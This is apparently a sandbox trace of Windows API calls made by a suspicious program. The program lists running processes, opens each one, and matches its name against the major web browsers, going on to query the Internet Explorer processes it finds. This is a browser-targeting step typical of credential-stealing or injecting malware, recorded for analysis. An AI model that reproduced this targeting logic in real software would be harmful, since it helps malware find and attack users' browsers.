	[0240.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.931] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.931] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0240.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8450
	[0240.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.932] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0240.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.932] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.933] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0240.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.933] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.933] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.934] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8454
	[0240.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.934] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.935] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.935] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.935] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.936] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0240.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8458
	[0240.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.937] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0240.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.937] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.937] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0240.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.938] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.938] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0240.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x845c
	[0240.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.939] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0240.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.939] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.939] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0240.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.940] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.940] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0240.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8460
	[0240.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.941] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0240.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.941] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.941] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0240.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.942] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.942] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0240.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8464
	[0240.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.943] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0240.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.943] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.944] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0240.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.944] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.944] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0240.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0240.945] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0240.946] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8468
	[0240.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.946] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0240.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.947] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.947] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0240.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.948] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.948] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0240.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x846c
	[0240.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.949] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0240.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.950] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.950] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0240.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.950] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.950] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0240.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8470
	[0240.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.951] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0240.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.952] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.953] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0240.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.953] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0240.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8474
	[0240.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.954] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0240.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.955] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.955] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0240.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.955] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.956] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0240.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x8478
	[0240.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.957] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0240.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.957] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.958] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0240.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.958] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.959] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0240.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x847c
	[0240.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.960] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0240.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.960] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.961] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0240.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.961] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.961] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0240.962] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8480
	[0240.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.962] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0240.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.962] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.963] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0240.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.963] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.964] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0240.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8484
	[0240.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.965] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0240.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.965] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.966] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0240.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.966] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.967] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0240.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8488
	[0240.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.968] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0240.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.968] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.968] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0240.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.968] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.969] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0240.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x848c
	[0240.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.969] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0240.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.970] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.970] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0240.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.970] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.971] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0240.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8490
	[0240.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.971] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0240.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.972] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.973] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0240.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.973] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.973] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0240.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8494
	[0240.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.975] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0240.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.975] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.976] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0240.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.977] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.977] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0240.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8498
	[0240.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.978] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0240.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.979] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.979] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0240.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.980] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.980] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0240.981] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x849c
	[0240.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.981] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0240.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.982] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.982] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0240.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.983] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.984] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0240.985] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x84a0
	[0240.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.985] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0240.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.985] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.986] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0240.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.986] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.987] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0240.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x84a4
	[0240.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.988] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0240.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.988] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0240.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.988] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0240.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.988] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.989] NtQueryInformationProcess (in: ProcessHandle=0x84a4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0240.989] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0240.990] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0240.990] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x84a8
	[0240.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.991] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0240.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.991] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0240.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.991] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0240.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.991] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.992] NtQueryInformationProcess (in: ProcessHandle=0x84a8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0240.992] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0240.992] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0240.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x84ac
	[0240.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
